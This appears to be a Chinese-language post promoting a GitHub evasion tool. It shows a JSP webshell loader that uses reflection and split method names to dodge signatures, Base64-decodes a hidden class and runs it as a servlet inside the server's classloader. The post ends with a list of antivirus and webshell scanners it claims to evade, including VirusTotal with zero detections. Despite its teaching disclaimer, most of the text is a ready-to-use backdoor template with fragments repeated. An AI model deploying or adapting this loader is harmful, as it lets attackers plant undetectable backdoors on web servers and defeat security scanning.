一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚
https://github.com/xiaogang000/XG_NTAI
<%!public static class M {
M(){}
public static java.util.Map<String,Object> getmethod () throws Exception {
java.util.HashMap<String, Object> map = new java.util.HashMap<String, Object>();
java.lang.reflect.Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
map.put("defineClass",defineClass);
java.lang.reflect.Method setAccessible = java.lang.reflect.AccessibleObject.class.getMethod("setAccessible", boolean.class);
map.put("setAccessible",setAccessible);
java.lang.reflect.Method loadClass = ClassLoader.class.getDeclaredMethod("loadClass", String.class);
map.put("loadClass",loadClass);
return map;
}
}%>
String yBTRKS_jsp = "ZHFxxxxxxx";
byte[] classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp);
yBTRKS_jsp = new String(classBytes_yBTRKS_jsp);
classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp.substring(24));
<%@ include file="method.jsp"%>
Method defineClass = (Method)M.getmethod().get("defi"+"neClass");
Method setAccessible = (Method)M.getmethod().get("setA"+"ccessible");
Method loadClass = (Method)M.getmethod().get("loadC"+"lass");
setAccessible.invoke(defineClass,true);
<%@ page pageEncoding="UTF-8" %>
<%@ page import="java.util.*" %>
<%@ page import="java.lang.reflect.*" %>
<%@ page import="org.apache.jasper.runtime.HttpJspBase" %>
<%@ include file="method.jsp"%>
<%
String yBTRKS_jsp = "ZHFxxxxxxx";
byte[] classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp);
yBTRKS_jsp = new String(classBytes_yBTRKS_jsp);
classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp.substring(24));
Method defineClass = (Method)M.getmethod().get("defi"+"neClass");
Method setAccessible = (Method)M.getmethod().get("setA"+"ccessible");
Method loadClass = (Method)M.getmethod().get("loadC"+"lass");
setAccessible.invoke(defineClass,true);
Class aClass = null;
try {
defineClass.invoke(application.getClassLoader(), "org.apache.jsp.yBTRKS_jsp", classBytes_yBTRKS_jsp, 0, classBytes_yBTRKS_jsp.length);
}catch (Exception exception){
aClass = (Class) loadClass.invoke(application.getClassLoader(), "org.apache.jsp.yBTRKS_jsp");
}
HttpJspBase httpJspBase = (HttpJspBase) aClass./*test*/
newInstance();
httpJspBase.init(pageContext.getServletConfig());
httpJspBase.service(request, response);
%>
可免杀:
阿里云恶意文件检测平台、阿里云主机病毒查杀、河马在线、河马本地(1.8.2)、
D盾(2.1.7)、微步(安全)、VT(0红)
使用XG_NTAI.jar一键免杀即可
XG拟态会持续更新免杀demo,多多支持star